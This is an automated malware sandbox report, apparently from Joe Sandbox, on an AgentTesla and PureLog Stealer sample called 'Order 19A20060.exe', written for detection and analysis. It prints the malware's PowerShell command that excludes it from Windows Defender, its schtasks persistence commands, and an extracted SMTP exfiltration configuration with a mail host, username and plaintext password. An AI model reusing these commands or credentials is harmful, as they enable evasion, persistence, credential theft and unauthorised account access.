
Windows Analysis Report
Order 19A20060.exe

Overview

General Information

Sample name: Order 19A20060.exe
Analysis ID: 1399297
MD5: 3c162b1caa9b65084775199af23b06de
SHA1: 4b401eebfab0a021d242ce7a1ff9c044d9813d10
SHA256: 5857b336d7d9853e12a8396380a452b1ea5c390a0409fb58ee6e7e77d9aabe00
Tags: AgentTesla, exe, RFQ

Detection

AgentTesla, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Order 19A20060.exe (PID: 7420 cmdline: C:\Users\user\Desktop\Order 19A20060.exe MD5: 3C162B1CAA9B65084775199AF23B06DE)
    • powershell.exe (PID: 7604 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7656 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8024 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7692 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Order 19A20060.exe (PID: 7872 cmdline: C:\Users\user\Desktop\Order 19A20060.exe MD5: 3C162B1CAA9B65084775199AF23B06DE)
  • SgJzugoOJvLgL.exe (PID: 7964 cmdline: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe MD5: 3C162B1CAA9B65084775199AF23B06DE)
    • schtasks.exe (PID: 7188 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp5E98.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SgJzugoOJvLgL.exe (PID: 3332 cmdline: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe MD5: 3C162B1CAA9B65084775199AF23B06DE)
    • SgJzugoOJvLgL.exe (PID: 3548 cmdline: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe MD5: 3C162B1CAA9B65084775199AF23B06DE)
    • SgJzugoOJvLgL.exe (PID: 1236 cmdline: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe MD5: 3C162B1CAA9B65084775199AF23B06DE)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elec-qatar.com", "Username": "mohammed.abrar@elec-qatar.com", "Password": "MHabrar2019@#"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author
00000000.00000002.1682578950.00000000077B0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0000000F.00000002.4097929274.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000F.00000002.4097929274.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000009.00000002.1714009771.000000000281D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0000000F.00000002.4097929274.0000000002BD7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(24 further entries not shown)

Source | Rule | Description | Author
0.2.Order 19A20060.exe.3190e28.7.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
9.2.SgJzugoOJvLgL.exe.289658c.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
9.2.SgJzugoOJvLgL.exe.2590e50.5.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.Order 19A20060.exe.349648c.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.Order 19A20060.exe.347842c.4.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
(35 further entries not shown)

                        System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\Order 19A20060.exe, ParentImage: C:\Users\user\Desktop\Order 19A20060.exe, ParentProcessId: 7420, ParentProcessName: Order 19A20060.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe, ProcessId: 7604, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\Order 19A20060.exe, ParentImage: C:\Users\user\Desktop\Order 19A20060.exe, ParentProcessId: 7420, ParentProcessName: Order 19A20060.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe, ProcessId: 7604, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp5E98.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp5E98.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe, ParentImage: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe, ParentProcessId: 7964, ParentProcessName: SgJzugoOJvLgL.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp5E98.tmp, ProcessId: 7188, ProcessName: schtasks.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 50.87.139.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Order 19A20060.exe, Initiated: true, ProcessId: 7872, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\Order 19A20060.exe, ParentImage: C:\Users\user\Desktop\Order 19A20060.exe, ParentProcessId: 7420, ParentProcessName: Order 19A20060.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmp, ProcessId: 7692, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\Order 19A20060.exe, ParentImage: C:\Users\user\Desktop\Order 19A20060.exe, ParentProcessId: 7420, ParentProcessName: Order 19A20060.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe, ProcessId: 7604, ProcessName: powershell.exe

                        Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\Order 19A20060.exe, ParentImage: C:\Users\user\Desktop\Order 19A20060.exe, ParentProcessId: 7420, ParentProcessName: Order 19A20060.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmp, ProcessId: 7692, ProcessName: schtasks.exe

Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
02/27/24-10:09:05.706606 | 2851779 | 49739 | 587 | TCP | A Network Trojan was detected
02/27/24-10:09:05.706606 | 2855542 | 49739 | 587 | TCP | A Network Trojan was detected
02/27/24-10:09:05.706606 | 2855245 | 49739 | 587 | TCP | A Network Trojan was detected
02/27/24-10:09:05.706606 | 2840032 | 49739 | 587 | TCP | A Network Trojan was detected
02/27/24-10:09:05.706606 | 2030171 | 49739 | 587 | TCP | A Network Trojan was detected
02/27/24-10:09:03.953321 | 2851779 | 49735 | 587 | TCP | A Network Trojan was detected
02/27/24-10:09:03.953263 | 2030171 | 49735 | 587 | TCP | A Network Trojan was detected
02/27/24-10:09:03.953321 | 2855542 | 49735 | 587 | TCP | A Network Trojan was detected
02/27/24-10:09:03.953321 | 2855245 | 49735 | 587 | TCP | A Network Trojan was detected
02/27/24-10:09:03.953321 | 2840032 | 49735 | 587 | TCP | A Network Trojan was detected

                        AV Detection

Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elec-qatar.com", "Username": "mohammed.abrar@elec-qatar.com", "Password": "MHabrar2019@#"}
Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Virustotal: Detection: 37%
Source: Order 19A20060.exe | ReversingLabs: Detection: 68%
Source: Order 19A20060.exe | Virustotal: Detection: 37%
Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Joe Sandbox ML: detected
Source: Order 19A20060.exe | Joe Sandbox ML: detected
Source: Order 19A20060.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: Order 19A20060.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: TBIu.pdbSHA2569 | source: Order 19A20060.exe, SgJzugoOJvLgL.exe.0.dr
Source: Binary string: TBIu.pdb | source: Order 19A20060.exe, SgJzugoOJvLgL.exe.0.dr
Source: C:\Users\user\Desktop\Order 19A20060.exe | Code function: 4x nop then jmp 0AC0019Dh | 0_2_0AC0080D

                        Networking

Source: Traffic | Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49735 -> 50.87.139.143:587
Source: Traffic | Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49735 -> 50.87.139.143:587
Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49735 -> 50.87.139.143:587
Source: Traffic | Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49735 -> 50.87.139.143:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49735 -> 50.87.139.143:587
Source: Traffic | Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49739 -> 50.87.139.143:587
Source: Traffic | Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49739 -> 50.87.139.143:587
Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49739 -> 50.87.139.143:587
Source: Traffic | Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49739 -> 50.87.139.143:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49739 -> 50.87.139.143:587
Source: Yara match | File source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.44d8f00.11.raw.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.4:49735 -> 50.87.139.143:587
Source: Joe Sandbox View | IP Address: 104.26.12.205
Source: Joe Sandbox View | IP Address: 50.87.139.143
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: global traffic | TCP traffic: 192.168.2.4:49735 -> 50.87.139.143:587
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: api.ipify.org
Source: Order 19A20060.exe, SgJzugoOJvLgL.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Order 19A20060.exe, SgJzugoOJvLgL.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: Order 19A20060.exe, 00000008.00000002.4097970191.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 0000000F.00000002.4097929274.0000000002BD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.elec-qatar.com
Source: Order 19A20060.exe, SgJzugoOJvLgL.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0
Source: Order 19A20060.exe, 00000000.00000002.1678263931.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000008.00000002.4097970191.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 00000009.00000002.1714009771.00000000025C4000.00000004.00000800.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 0000000F.00000002.4097929274.0000000002B61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: Order 19A20060.exe, 00000000.00000002.1681895785.0000000005C10000.00000004.00000020.00020000.00000000.sdmp, Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: Order 19A20060.exe, 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000000.00000002.1679354233.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000008.00000002.4094342515.0000000000428000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: Order 19A20060.exe, 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000000.00000002.1679354233.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000008.00000002.4097970191.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000008.00000002.4094342515.0000000000428000.00000040.00000400.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 0000000F.00000002.4097929274.0000000002B61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: Order 19A20060.exe, 00000008.00000002.4097970191.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 0000000F.00000002.4097929274.0000000002B61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: Order 19A20060.exe, 00000008.00000002.4097970191.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 0000000F.00000002.4097929274.0000000002B61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/t
Source: Order 19A20060.exe, SgJzugoOJvLgL.exe.0.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49738 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, K6jmfEUYzg.cs | .Net Code: aft6g33EiG
Source: 0.2.Order 19A20060.exe.44d8f00.11.raw.unpack, K6jmfEUYzg.cs | .Net Code: aft6g33EiG
Source: C:\Users\user\Desktop\Order 19A20060.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Order 19A20060.exe
Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
Source: C:\Users\user\Desktop\Order 19A20060.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Window created: window name: CLIPBRDWNDCLASS

                        System Summary

                        Source: 0.2.Order 19A20060.exe.44d8f00.11.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.Order 19A20060.exe.4513b20.8.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 8.2.Order 19A20060.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.Order 19A20060.exe.44d8f00.11.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: initial sample | Static PE information: Filename: Order 19A20060.exe
                        Source: Order 19A20060.exe | Static PE information: invalid certificate
                        Source: Order 19A20060.exe, 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename1aa5ed53-faea-433c-bf5f-9e47e14be233.exe4 vs Order 19A20060.exe
